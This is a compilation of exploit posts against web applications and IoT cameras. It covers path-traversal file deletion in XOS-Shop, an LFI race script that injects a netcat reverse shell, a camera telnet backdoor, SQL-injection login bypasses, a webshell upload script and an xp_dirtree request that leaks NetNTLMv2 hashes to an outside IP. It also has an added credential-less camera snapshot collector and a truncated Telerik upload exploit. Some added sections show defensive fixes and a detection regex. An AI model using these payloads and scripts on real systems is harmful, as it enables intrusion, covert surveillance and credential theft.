PoC #1) param current_manufacturer_image - Deleting backup.conf file in web root

Request:
========

POST /xos_shop_v1.0.9/shop/admin/manufacturers.php?page=1&mID=10&action=save HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------120849309142309531191692203678
Content-Length: 1305
Origin: http://localhost
DNT: 1
Connection: close
Referer: http://localhost/xos_shop_v1.0.9/shop/admin/manufacturers.php?page=1&mID=10&action=edit
Cookie: XOSsidAdmin=os13rkgs85m47iak7l8ck2j1ja
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Sec-GPC: 1

-----------------------------120849309142309531191692203678
Content-Disposition: form-data; name="manufacturers_name[2]"

App
-----------------------------120849309142309531191692203678
Content-Disposition: form-data; name="manufacturers_name[1]"

App
-----------------------------120849309142309531191692203678
Content-Disposition: form-data; name="manufacturers_name[3]"

App
-----------------------------120849309142309531191692203678
Content-Disposition: form-data; name="manufacturers_url[2]"

app.com
-----------------------------120849309142309531191692203678
Content-Disposition: form-data; name="manufacturers_url[1]"

app.com
-----------------------------120849309142309531191692203678
Content-Disposition: form-data; name="manufacturers_url[3]"

app.com
-----------------------------120849309142309531191692203678
Content-Disposition: form-data; name="delete_manufacturer_image"

true
-----------------------------120849309142309531191692203678
Content-Disposition: form-data; name="current_manufacturer_image"

../../backup.conf
-----------------------------120849309142309531191692203678
Content-Disposition: form-data; name="manufacturers_image"; filename=""
Content-Type: application/octet-stream


-----------------------------120849309142309531191692203678--

---

##########
# PoC 2  #
##########

Vulnerable URL: http://localhost/xos_shop_v1.0.9/shop/admin/categories.php
Vulnerable Code: line 154-156, 167-169, 421-425, 433-437 - xos_shop_v1.0.9\shop\admin\categories.php
Note: Multiple parameters affected

Steps to Reproduce:
1. Login as admin
2. Goto Catalog > Categories/Products > edit any category
3. Upload any image as "Category Image" if there is no existing image and click save button, else
4. Tick "Delete" checkbox and click save button
5. Intercept the request and replace the existing image name with any file on the server via the parameter "current_category_image".

# Assumed there is a backup.conf file in the web root

PoC #2) param current_category_image - Deleting backup.conf file in web root

Request:
========

POST /xos_shop_v1.0.9/shop/admin/categories.php?action=update_category&cPath=&cpID=1 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------95672159210084798032704634599
Content-Length: 2524
Origin: http://localhost
DNT: 1
Connection: close
Referer: http://localhost/xos_shop_v1.0.9/shop/admin/categories.php?cPath=&cpID=1&action=new_category
Cookie: XOSsidAdmin=os13rkgs85m47iak7l8ck2j1ja
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Sec-GPC: 1

-----------------------------95672159210084798032704634599
Content-Disposition: form-data; name="categories_or_pages_id"

1
-----------------------------95672159210084798032704634599
Content-Disposition: form-data; name="current_category_image"

../../../backup.conf
-----------------------------95672159210084798032704634599
Content-Disposition: form-data; name="category_name"

Hardware
-----------------------------95672159210084798032704634599
Content-Disposition: form-data; name="current_categories_or_pages_status"

1
-----------------------------95672159210084798032704634599
Content-Disposition: form-data; name="delete_category_image"

true
-----------------------------95672159210084798032704634599
Content-Disposition: form-data; name="categories_image"; filename=""
Content-Type: application/octet-stream


-----------------------------95672159210084798032704634599
Content-Disposition: form-data; name="product_list_b"

0
-----------------------------95672159210084798032704634599
Content-Disposition: form-data; name="sort_order"

10
-----------------------------95672159210084798032704634599
Content-Disposition: form-data; name="categories_or_pages_status"

1
-----------------------------95672159210084798032704634599
Content-Disposition: form-data; name="categories_or_pages_name[2]"

Hardware
-----------------------------95672159210084798032704634599
Content-Disposition: form-data; name="categories_or_pages_name[1]"

Hardware
-----------------------------95672159210084798032704634599
Content-Disposition: form-data; name="categories_or_pages_name[3]"

Hardware
-----------------------------95672159210084798032704634599
Content-Disposition: form-data; name="categories_or_pages_heading_title[2]"


-----------------------------95672159210084798032704634599
Content-Disposition: form-data; name="categories_or_pages_heading_title[1]"


-----------------------------95672159210084798032704634599
Content-Disposition: form-data; name="categories_or_pages_heading_title[3]"


-----------------------------95672159210084798032704634599
Content-Disposition: form-data; name="categories_or_pages_content[2]"


-----------------------------95672159210084798032704634599
Content-Disposition: form-data; name="categories_or_pages_content[1]"


-----------------------------95672159210084798032704634599
Content-Disposition: form-data; name="categories_or_pages_content[3]"


-----------------------------95672159210084798032704634599--

---

# For more explanation, you can refer to the github issue on XOS-Shop via https://github.com/XOS-Shop/xos_shop_system/issues/1
# The affected version is prior to v1.0.9.
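The root cause in both PoCs is the same: the submitted image name (`current_manufacturer_image`, `current_category_image`) is joined to the upload directory and unlinked without checking where the resulting path points, so `../../backup.conf` walks out of the image directory. The following is an added example, not XOS-Shop's code, that contrasts that pattern with a hardened delete in Python (the shop is PHP; the same `basename` plus resolved-path containment check applies there with `basename()` and `realpath()`). The web-root layout and the `backup.conf` target are constructed in a temporary directory so the demo runs offline.

```python
import os
import tempfile


def delete_image_unsafe(images_dir, name):
    """Mirrors the flawed pattern: the submitted name is joined to the image
    directory and removed with no check on the result."""
    path = os.path.join(images_dir, name)
    os.unlink(path)
    return path


def delete_image_safe(images_dir, name):
    """Hardened form: accept only a bare file name, resolve symlinks, and refuse
    anything whose real path is not inside the image directory."""
    if name in ("", ".", "..") or name != os.path.basename(name):
        raise ValueError("not a plain file name: %r" % name)
    base = os.path.realpath(images_dir)
    path = os.path.realpath(os.path.join(base, name))
    if os.path.commonpath([base, path]) != base:
        raise ValueError("path escapes image directory: %r" % name)
    if not os.path.isfile(path):
        raise FileNotFoundError(path)
    os.unlink(path)
    return path


def demo():
    """Build a constructed web root, run both deletes against it, and report
    which files survived each one."""
    root = tempfile.mkdtemp()
    images = os.path.join(root, "shop", "images", "manufacturers")
    os.makedirs(images)
    secret = os.path.join(root, "shop", "backup.conf")       # constructed target file
    open(secret, "w").close()
    open(os.path.join(images, "logo.png"), "w").close()     # a legitimate upload

    results = {}
    try:
        delete_image_safe(images, "../../backup.conf")
        results["safe_blocked"] = False
    except ValueError:
        results["safe_blocked"] = True
    results["secret_after_safe"] = os.path.exists(secret)

    delete_image_unsafe(images, "../../backup.conf")         # the PoC's traversal
    results["secret_after_unsafe"] = os.path.exists(secret)

    delete_image_safe(images, "logo.png")                    # the intended use still works
    results["logo_after_safe"] = os.path.exists(os.path.join(images, "logo.png"))
    return results


if __name__ == "__main__":
    for k, v in demo().items():
        print(k, v)
```

The `basename` check alone is not enough on its own: a symlink placed inside the upload directory (for example through a separate upload flaw) would still resolve outside it, which is why the `realpath` containment check is kept as a second gate.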
-
PHP 7.3.15-3 - 'PHP_SESSION_UPLOAD_PROGRESS' Session Data Injection
# Exploit Title: PHP 7.3.15-3 - 'PHP_SESSION_UPLOAD_PROGRESS' Session Data Injection
# Date: 26/7/2021
# Exploit Author: SiLvER | Faisal Alhadlaq
# Tested on: PHP Version is 7.3.15-3

# This PoC abuses PHP_SESSION_UPLOAD_PROGRESS to write attacker-controlled data into the session file, then wins a race against session.upload_progress.cleanup by including the file through an LFI, giving remote code execution. The injected PHP spawns a reverse shell with netcat.

#!/usr/bin/python3
"""
Usage : python3 poc.py <Target URL> <ListenerIP> <ListenerPORT>
        python3 poc.py https://xyz.xyz 192.168.1.15 1337
"""
import requests
import threading
import datetime
import sys

# Stop all threads after ten seconds of trying
x = datetime.datetime.now()
addSeconds = datetime.timedelta(0, 10)
newDatetime = x + addSeconds


def fuzz():
    targetIP = sys.argv[1]
    listnerIP = sys.argv[2]
    listnerPORT = sys.argv[3]
    global newDatetime
    while True:
        try:
            if datetime.datetime.now() > newDatetime:
                return
            # proxies = {
            #     "http": "http://127.0.0.1:8080",
            #     "https": "https://127.0.0.1:8080",
            # }
            sessionName = "SiLvER"
            url = targetIP
            s = requests.Session()
            cookies = {'PHPSESSID': sessionName}
            # The PHP_SESSION_UPLOAD_PROGRESS value is stored in sess_<PHPSESSID> while the upload is in progress;
            # the padded 'file' part keeps the upload (and the session entry) alive long enough to include it
            files = {
                'PHP_SESSION_UPLOAD_PROGRESS': (None, '<?php `nc ' + listnerIP + ' ' + listnerPORT + ' -e /bin/bash`;?>'),
                'file': ('anyThinG', 'Abusing PHP_SESSION_UPLOAD_PROGRESS By Faisal Alhadlaq ' * 100, 'application/octet-stream'),
            }
            # You need to change the parameter in your case; here the vulnerable parameter is (lfi)
            params = (('lfi', '/var/lib/php/sessions/sess_' + sessionName),)
            resp = s.post(url, files=files, params=params, cookies=cookies, allow_redirects=False, verify=False)  # , proxies=proxies
        except Exception as error:
            print(error)
            return


def main():
    print("\n(+) PoC for Abusing PHP_SESSION_UPLOAD_PROGRESS By SiLvER\n")
    threads = []
    for _ in range(20):
        t = threading.Thread(target=fuzz)
        t.start()
        threads.append(t)
    for thread in threads:
        thread.join()


if __name__ == "__main__":
    if len(sys.argv) < 4:
        print("\n(-) Usage: {} <Target URL> <ListenerIP> <ListenerPORT>".format(sys.argv[0]))
        print("(-) eg: {} https://xyz.xyz 192.168.1.15 1337 ".format(sys.argv[0]))
        print("\n(=) By SiLvER \n")
        exit()
    else:
        main()
-
Denver Smart Wifi Camera SHC-150 - 'Telnet' Remote Code Execution (RCE)
# Exploit Title: Denver Smart Wifi Camera SHC-150 - 'Telnet' Remote Code Execution (RCE)
# Date: 27 July 2021
# Exploit Author: Ivan Nikolsky (enty8080)
# Vendor Homepage: https://denver.eu/products/smart-home-security/denver-shc-150/c-1024/c-1243/p-3824
# Version: Denver SHC-150 (all firmware versions)
# Tested on: Denver SHC-150

A backdoor was found in the Denver SHC-150 Smart Wifi Camera; other models may carry it as well.

The backdoor is a factory telnet account named `default`. Open a telnet connection to the camera on port 23 (the standard telnet port, which is where these cameras serve it), enter `default` at the login prompt, and you get a Linux shell without being asked for a password. The backdoor allows an attacker to execute commands at the OS level through telnet.

PoC:

```
enty8080@Ivans-Air ~ % telnet 192.168.2.118 23
Trying 192.168.2.118...
Connected to pc192-168-2-118.
Escape character is '^]'.

goke login: default
$ ls /
bin      home     linuxrc  opt      run      tmp
dev      init     media    proc     sbin     usr
etc      lib      mnt      root     sys      var
$ pwd
/home/default
$ exit
Connection closed by foreign host.
enty8080@Ivans-Air ~ %
```
-
Event Registration System with QR Code 1.0 - Authentication Bypass
# Exploit Title: Event Registration System with QR Code 1.0 - Authentication Bypass & RCE
# Exploit Author: Javier Olmedo
# Date: 27/07/2021
# Vendor: Sourcecodester
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/event_0.zip
# Affected Version: 1.0
# Category: WebApps
# Platform: PHP
# Tested on: Ubuntu Server & Windows 10 Pro

import os, re, sys, argparse, requests
from termcolor import cprint


def banner():
    os.system("cls" if os.name == "nt" else "clear")
    print(r'''
___________                   __
\_   _____/__  __ ____   _____/  |_
 |    __)_\  \/ // __ \ /    \   __\
 |        \\   /\  ___/|   |  \  |
/_______  / \_/  \___  >___|  /__|
        \/           \/     \/
        Registration System
  --[Authentication Bypass and RCE]--
           @jjavierolmedo
''')


def get_args():
    parser = argparse.ArgumentParser(description='Event - Authentication Bypass and RCE Exploit')
    parser.add_argument('-t', '--target', dest="target", required=True, action='store', help='Target url')
    parser.add_argument('-p', '--proxy', dest="proxy", required=False, action='store', help='Use proxy')
    args = parser.parse_args()
    return args


def auth_bypass(s, proxies, url):
    # The quote closes the username literal and # comments out the password check (MySQL)
    data = {
        "username": "admin'#",
        "password": ""
    }
    r = s.post(url, data=data, proxies=proxies)
    if '{"status":"success"}' in r.text:
        cprint("[+] Authentication Bypass Success!\n", "green")
        return s
    else:
        cprint("[-] Authentication Bypass Error!\n", "red")
        sys.exit(0)


def upload_shell(s, proxies, url):
    # The system-settings logo upload keeps the original extension, so a .php file is stored as-is
    content = "<?php echo '<pre>' . shell_exec($_REQUEST['cmd']) . '</pre>';?>"
    file = {
        'img': ('cmd.php', content)
    }
    data = {
        "name": "Event Registration System with QR Code - PHP",
        "short_name": "ERS-QR-PHP",
    }
    r = s.post(url, files=file, data=data, proxies=proxies)
    if '1' in r.text and r.status_code == 200:
        cprint("[+] Upload Shell Success!\n", "green")
        return s
    else:
        cprint("[-] Upload Shell Error!\n", "red")
        sys.exit(0)


def get_shell_url(s, proxies, url):
    # The uploads directory lists its files; the stored name is <random>_cmd.php
    r = s.get(url, proxies=proxies)
    regex = r'_cmd.php"> (.*?)</a></li>'
    shell_name = re.findall(regex, r.text)[0]
    url_shell = "{url}{shell_name}?cmd=whoami".format(url=url, shell_name=shell_name)
    cprint("[+] Use your shell --> {url_shell}\n".format(url_shell=url_shell), "green")


def main():
    banner()
    args = get_args()
    target = args.target
    proxies = {'http': '', 'https': ''}
    if args.proxy:
        proxies = {'http': '{proxy}'.format(proxy=args.proxy), 'https': '{proxy}'.format(proxy=args.proxy)}

    login_url = target + "/event/classes/Login.php?f=rlogin"
    upload_url = target + "/event/classes/SystemSettings.php?f=update_settings"
    shell_url = target + "/event/uploads/"

    s = requests.Session()
    s = auth_bypass(s, proxies, login_url)
    s = upload_shell(s, proxies, upload_url)
    get_shell_url(s, proxies, shell_url)


if __name__ == "__main__":
    try:
        main()
    except KeyboardInterrupt:
        cprint("[-] User aborted session\n", "red")
        sys.exit(0)

# Disclaimer
# The information contained in this notice is provided without any guarantee of use or otherwise.
# The redistribution of this notice is explicitly permitted for insertion into vulnerability
# databases, provided that it is not modified and due credit is granted to the author.
# The author prohibits the malicious use of the information contained herein and accepts no responsibility.
# All content (c) Javier Olmedo
-
Customer Relationship Management System (CRM) 1.0 - Sql Injection Authentication Bypass
# Exploit Title: Customer Relationship Management System (CRM) 1.0 - SQL Injection Authentication Bypass
# Date: 27/07/2021
# Exploit Author: Shafique_Wasta
# Vendor Homepage: https://www.sourcecodester.com/php/14794/customer-relationship-management-crm-system-php-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/crm_0.zip
# Version: 1
# Tested on: Windows 10/xampp

# DESCRIPTION
#
# Customer Relationship Management System is vulnerable to an SQL injection authentication bypass.

# Exploit Working:
# 1. Visit http://localhost/crm/customer/login.php
# 2. You will see the login panel
# 3. Use this payload ( '=' 'or' ) as the username, click on Sign In, and you will be logged into the admin account.

# Vulnerable URL: http://localhost/crm/customer/login.php
# Payload: '=' 'or'
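Both this post and the Event Registration System post above bypass login by breaking out of the username literal in a query that is assembled from strings: `admin'#` there closes the quote and comments out the password check, while the `'=' 'or'` payload here also relies on MySQL's loose string-to-number comparison, which SQLite does not reproduce. The following is an added example, not either application's code, that shows the string-built query behind the bypass next to the parameterised form that defeats it. The users table is constructed in an in-memory SQLite database, and the payload uses `-- ` rather than `#` because `#` is a comment only in MySQL.

```python
import sqlite3


def make_db():
    """Constructed in-memory users table standing in for the application's MySQL table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES (1, 'admin', 's3cret')")
    return conn


def build_query(username, password):
    """The string-built statement behind both bypasses: user input becomes SQL text."""
    return "SELECT id FROM users WHERE username = '%s' AND password = '%s'" % (username, password)


def login_vulnerable(conn, username, password):
    return conn.execute(build_query(username, password)).fetchone() is not None


def login_safe(conn, username, password):
    """Parameterised form: the payload is bound as data and can never close the quote."""
    sql = "SELECT id FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone() is not None


# SQLite equivalent of the PoC's admin'# : close the literal, then comment out the
# rest of the WHERE clause so the password is never compared.
BYPASS = "admin'-- "

if __name__ == "__main__":
    conn = make_db()
    print(build_query(BYPASS, ""))
    print("vulnerable login with bypass:", login_vulnerable(conn, BYPASS, ""))
    print("safe login with bypass:     ", login_safe(conn, BYPASS, ""))
    print("safe login with password:   ", login_safe(conn, "admin", "s3cret"))
```

Escaping the quote (`mysqli_real_escape_string`) would also stop these two payloads, but parameter binding is the fix that holds regardless of the database's comparison rules or comment syntax.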
-
TripSpark VEO Transportation - Blind SQL Injection
# Exploit Title: TripSpark VEO Transportation - 'editOEN' Blind SQL Injection
# Google Dork: inhtml:"Student Busing Information"
# Date: 07/27/2021
# Exploit Author: Sedric Louissaint @L_Kn0w
# Vendor Homepage: https://www.tripspark.com
# Software Document Link: https://www.tripspark.com/resource_files/veo-transportation.pdf
# Version: NovusEDU-2.2.x-XP_BB-20201123-184084 / VEO--20201123-184084
# OS Tested on: Microsoft Windows Server 2012 R2 Standard
# Vendor Notified: 01/19/2021
# Confirmed Patch was released: 06/15/2021

# Summary: The POST body parameter editOEN is vulnerable to blind SQL injection. Any user can inject custom SQL commands into the "Student Busing Information" search queries. A single crafted request is enough; no exploit tooling is needed.

# PoC to trigger a DNS/HTTP request and capture the NetNTLMv2 hash (if 445 is allowed outbound).

```
POST / HTTP/1.1
Host: vulnerable.site.net
User-Agent: Mozilla/5.0 (x; x; rv:68.0) x/20100101 x/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 4700
Origin: vulnerable.site.net
Connection: close
Referer: https://vulnerable.site.net
Cookie: ASP.NET_SessionId=x
Upgrade-Insecure-Requests: 1
DNT: 1
Sec-GPC: 1

__VIEWSTATE=redacted&__VIEWSTATEGENERATOR=2A5DADC0&__EVENTVALIDATION=redacted&editOEN=123'%3bdeclare%20@q%20varchar(99)%3bset%20@q%3d'%5c%5c52.173.115.212'%2b'%5cfro'%3b%20exec%20master.dbo.xp_dirtree%20@q%3b--%20&cboxMonth=01&cboxDay=01&cboxYear=2001&btnLogin=Submit
```
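The request above chains three things a detection rule can key on independently: a stacked query (`';`), a call to `xp_dirtree`, and a UNC path that makes the SQL Server service account authenticate to the attacker's host. The following is an added example, not TripSpark's code and not the reporter's, of a check over URL-encoded POST bodies as a WAF or an IIS request log with body capture would see them. The sample body is constructed from the PoC with the collector address replaced by a TEST-NET address; the benign body is an ordinary search.

```python
import re
from urllib.parse import parse_qs

# A closing quote or parenthesis followed by a statement separator: the shape of a stacked query.
STACK_RE = re.compile(r"['\")]\s*;")
# SQL Server extended procedures that take a path and will authenticate to a UNC host.
PROC_RE = re.compile(r"\bxp_(?:dirtree|fileexist|subdirs)\b", re.I)
# Start of a UNC path: two backslashes followed by a host name or address.
UNC_RE = re.compile(r"\\\\[\w.\-]+")

INDICATORS = (
    ("stacked query", STACK_RE),
    ("xp_ filesystem procedure", PROC_RE),
    ("UNC path", UNC_RE),
)


def body_findings(body):
    """Decode an application/x-www-form-urlencoded body and return, for each
    parameter whose decoded value matches, the list of indicators it matched."""
    findings = []
    for param, values in parse_qs(body, keep_blank_values=True).items():
        for value in values:
            hits = [label for label, rx in INDICATORS if rx.search(value)]
            if hits:
                findings.append((param, hits))
    return findings


# Constructed sample body modelled on the PoC request (collector address replaced).
SAMPLE = ("__VIEWSTATE=redacted&__VIEWSTATEGENERATOR=2A5DADC0&__EVENTVALIDATION=redacted"
          "&editOEN=123'%3bdeclare%20@q%20varchar(99)%3bset%20@q%3d'%5c%5c192.0.2.10'%2b'%5cfro'"
          "%3b%20exec%20master.dbo.xp_dirtree%20@q%3b--%20"
          "&cboxMonth=01&cboxDay=01&cboxYear=2001&btnLogin=Submit")
# Constructed benign search for comparison.
BENIGN = "__VIEWSTATE=redacted&editOEN=123456789&cboxMonth=01&cboxDay=01&cboxYear=2001&btnLogin=Submit"

if __name__ == "__main__":
    print("sample:", body_findings(SAMPLE))
    print("benign:", body_findings(BENIGN))
```

Any one indicator on its own is noisy (a free-text field can legitimately contain `';`), but all three in a single parameter is the signature of exactly this technique, and the UNC host it names is the address to block at the egress firewall and to search for in SQL Server's error log.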
-
Denver IP Camera SHO-110 - Unauthenticated Snapshot
# Exploit Title: Denver IP Camera SHO-110 - Unauthenticated Snapshot
# Date: 28 July 2021
# Exploit Author: Ivan Nikolsky (enty8080)
# Vendor Homepage: https://denver.eu/products/smart-home-security/denver-sho-110/c-1024/c-1243/p-3826
# Version: Denver SHO-110 (all firmware versions)
# Tested on: Denver SHO-110

A backdoor was found in the Denver SHO-110 IP Camera; other models may carry it as well.

The camera runs two HTTP services: the first, on port 80, requires authentication; the second, on port 8001, does not. The second service exposes a `/snapshot` endpoint that returns a still image to anyone who asks. A script that polls this endpoint and stitches the snapshots together lets an attacker reconstruct the camera stream without credentials.

PoC:

http://<host>:8001/snapshot
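The post notes that the unauthenticated `/snapshot` endpoint on port 8001 can be polled to reconstruct the stream. The following is an added example, not the reporter's code, of that collector in Python: it checks that each response is a JPEG, drops frames identical to the previous one, and can wrap the result as an MJPEG body for a normal video player. The fetch function is injected so the demo runs offline on constructed frames; `http_fetcher` assumes the endpoint answers a plain GET with one JPEG per request, which the post states for the SHO-110 only.

```python
import time

JPEG_SOI = b"\xff\xd8"   # start of image
JPEG_EOI = b"\xff\xd9"   # end of image


def is_jpeg(data):
    """Cheap structural check: a JPEG starts with SOI and ends with EOI."""
    return len(data) > 4 and data.startswith(JPEG_SOI) and data.endswith(JPEG_EOI)


def collect_snapshots(fetch, count, interval=0.0, sleep=time.sleep):
    """Call fetch() `count` times and keep the well-formed JPEGs that differ from
    the frame before them, in order. Truncated or non-image responses are dropped."""
    frames = []
    last = None
    for _ in range(count):
        data = fetch()
        if is_jpeg(data) and data != last:
            frames.append(data)
            last = data
        if interval:
            sleep(interval)
    return frames


def to_mjpeg(frames, boundary="frame"):
    """Join frames into a multipart/x-mixed-replace body, the framing most players
    accept as a live MJPEG stream when served with that content type."""
    out = bytearray()
    for f in frames:
        out += b"--%s\r\nContent-Type: image/jpeg\r\nContent-Length: %d\r\n\r\n" % (boundary.encode(), len(f))
        out += f + b"\r\n"
    return bytes(out)


def http_fetcher(host, port=8001, path="/snapshot", timeout=5):
    """Fetcher for the endpoint named in the post. Assumption: a GET returns one JPEG body."""
    import urllib.request

    def fetch():
        with urllib.request.urlopen("http://%s:%d%s" % (host, port, path), timeout=timeout) as r:
            return r.read()
    return fetch


def demo():
    """Run the collector over constructed responses: frame A twice, a non-image
    response, then frame B twice. Expect exactly A and B back."""
    a = JPEG_SOI + b"A" * 8 + JPEG_EOI
    b = JPEG_SOI + b"B" * 8 + JPEG_EOI
    responses = iter([a, a, b"not a jpeg", b, b])
    return collect_snapshots(lambda: next(responses), 5)


if __name__ == "__main__":
    frames = demo()
    print(len(frames), "frames;", len(to_mjpeg(frames)), "bytes of MJPEG")
    # live use: collect_snapshots(http_fetcher("192.0.2.50"), 50, interval=0.2)
```

Byte-identical comparison is a coarse change detector; cameras that re-encode every frame will rarely produce identical bytes, in which case the dedup simply keeps everything. The same loop is also what a defender would run to confirm the finding before filing it: if `http_fetcher` returns a JPEG without any credential, the endpoint is exposed.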
-
GFI Mail Archiver 15.1 - Telerik UI Component Arbitrary File Upload (Unauthenticated)
# Exploit Title: GFI Mail Archiver 15.1 - Telerik UI Component Arbitrary File Upload (Unauthenticated)
# Date: 21/03/2021
# Exploit Author: Amin Bohio
# Original Research & Code By: Paul Taylor / Foregenix Ltd
# Original Exploit: https://github.com/bao7uo/RAU_crypto
# Vendor Homepage: https://www.gfi.com
# Software Link: https://www.gfi.com/products-and-solutions/network-security-solutions/gfi-archiver
# Vulnerable Versions: GFI Mail Archiver <= 15.1
# Component Advisory: https://www.telerik.com/support/kb/aspnet-ajax/upload-(async)/details/unrestricted-file-upload
# Component Advisory: https://www.telerik.com/support/kb/aspnet-ajax/upload-(async)/details/insecure-direct-object-reference
# Tested on: Windows & Linux
# Usage: python3 gfipwn.py -u http://[host]/Archiver/ -f filetoupload -p pathonwebserver

#!/usr/bin/python3
# Original Telerik Exploit Author: Paul Taylor / @bao7uo
# https://github.com/bao7uo/RAU_crypto/blob/master/RAU_crypto.py
# Modified by: Amin Bohio

import sys
import base64
import json
import re
import requests
import os
from Crypto.Cipher import AES
from Crypto.Hash import HMAC
from Crypto.Hash import SHA256
from Crypto.Hash import SHA1
from struct import Struct
from operator import xor
from itertools import starmap
import binascii
from requests.packages.urllib3.exceptions import InsecureRequestWarning

# ******************************************
# ******************************************
# ADVANCED_SETTINGS section 1 of 2
# Warning, the below prevents certificate warnings,
# and verify = False (CERT_VERIFY prevents them being verified
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
CERT_VERIFY = False
# ******************************************
# ******************************************


class PBKDF:

    def sha1(v):
        hl = SHA1.new()
        hl.update(v)
        return hl.digest()

    def derive1(password, salt):
        # Pre-2019 Telerik key derivation: 100 chained SHA-1 rounds, then
        # counter-suffixed digests until 48 bytes are available
        hash = (password + salt).encode()
        for i in range(0, 99):
            hash = PBKDF.sha1(hash)
        result = PBKDF.sha1(hash)
        i = 1
        while len(result) < 48:
            result += PBKDF.sha1(str(i).encode() + hash)
            i += 1
        return result

    def hmacsha1(v):
        hl = PBKDF.mac.copy()
        hl.update(v)
        return bytearray(hl.digest())

    def derive2(password, salt):
        # Credit: @mitsuhiko https://github.com/mitsuhiko/python-pbkdf2/blob/master/pbkdf2.py
        # PBKDF2-HMAC-SHA1, 1000 iterations, 48 bytes of output
        result_length = 48
        PBKDF.mac = HMAC.new(bytes(password.encode()), None, SHA1.new())
        result = []
        for b in range(1, -(-result_length // PBKDF.mac.digest_size) + 1):
            rv = u = PBKDF.hmacsha1(salt.encode() + Struct('>i').pack(b))
            for i in range(999):
                u = PBKDF.hmacsha1(u)
                rv = starmap(xor, zip(rv, u))
            result.extend(rv)
        result = b''.join(map(bytes, [result]))[:result_length]
        return result

    def derive(type, password, salt=''.join(chr(i) for i in [58, 84, 91, 25, 10, 34, 29, 68, 60, 88, 44, 51, 1])):
        if type == 1:
            result = PBKDF.derive1(password, salt)
            result = result[0:32] + result[8:16] + result[40:48]  # Bizarre hack
        elif type == 2:
            result = PBKDF.derive2(password, salt)
        return result[0:32], result[32:]


class RAUCipher:

    # ******************************************
    # ******************************************
    # ADVANCED_SETTINGS section 2 of 2
    # Default settings are for vulnerable versions before 2017 patches with default keys

    T_Upload_ConfigurationHashKey = \
        "PrivateKeyForHashOfUploadConfiguration"
    # Default hardcoded key for versions before 2017 patches
    HASHKEY = T_Upload_ConfigurationHashKey  # or your custom hashkey

    T_AsyncUpload_ConfigurationEncryptionKey = \
        "PrivateKeyForEncryptionOfRadAsyncUploadConfiguration"
    # Default hardcoded key for versions before 2017 patches
    PASSWORD = T_AsyncUpload_ConfigurationEncryptionKey  # or your custom password

    # Latest tested version working with this setting: 2018.1.117
    # Probably working up to and including 2018.3.910
    PBKDF_ALGORITHM = 1

    # Earliest tested version working with this setting: 2019.2.514
    # Probably introduced 2019.1.115
    # PBKDF_ALGORITHM = 2

    # ******************************************
    # ******************************************

    key, iv = PBKDF.derive(PBKDF_ALGORITHM, PASSWORD)
    # print(binascii.hexlify(key).decode().upper())
    # print(binascii.hexlify(iv).decode().upper())

    def encrypt(plaintext):
        # UTF-16LE-style widening (each char followed by NUL), PKCS#7 padding, AES-CBC
        sys.stderr.write("Encrypting... ")
        encoded = ""
        for i in plaintext:
            encoded = encoded + i + "\x00"
        plaintext = encoded + (
            chr(16 - (len(encoded) % 16)) * (16 - (len(encoded) % 16))
        )
        cipher = AES.new(RAUCipher.key, AES.MODE_CBC, RAUCipher.iv)
        sys.stderr.write("done\n")
        return base64.b64encode(cipher.encrypt(plaintext.encode())).decode()

    def decrypt(ciphertext):
        sys.stderr.write("Decrypting... ")
        ciphertext = base64.b64decode(ciphertext)
        cipher = AES.new(RAUCipher.key, AES.MODE_CBC, RAUCipher.iv)
        unpad = lambda s: s[0:-ord(chr(s[-1]))]
        sys.stderr.write("done\n")
        return unpad(cipher.decrypt(ciphertext)).decode()[0::2]

    def addHmac(string, Version):
        isHmacVersion = False
        # "Encrypt-then-MAC" feature introduced in R1 2017
        # Required for >= "2017.1.118" (e.g. "2017.1.118", "2017.1.228", "2017.2.503" etc.)
        if int(Version[:4]) >= 2017:
            isHmacVersion = True
        hmac = HMAC.new(
            bytes(RAUCipher.HASHKEY.encode()),
            string.encode(),
            SHA256.new()
        )
        hmac = base64.b64encode(hmac.digest()).decode()
        return string + hmac if isHmacVersion else string


def getProxy(proxy):
    return {"http": proxy, "https": proxy}


def rauPostData_enc(partA, partB):
    data = "-----------------------------62616f37756f2f\r\n"
    data += "Content-Disposition: form-data; name=\"rauPostData\"\r\n"
    data += "\r\n"
    data += RAUCipher.encrypt(partA) + "&" + RAUCipher.encrypt(partB) + "\r\n"
    return data


def rauPostData_prep(TempTargetFolder, Version):
    TargetFolder = RAUCipher.addHmac(
        RAUCipher.encrypt(""), Version
    )
    TempTargetFolder = RAUCipher.addHmac(
        RAUCipher.encrypt(TempTargetFolder), Version
    )
    partA = \
        '{"TargetFolder":"' + TargetFolder + '","TempTargetFolder":"' + \
        TempTargetFolder + \
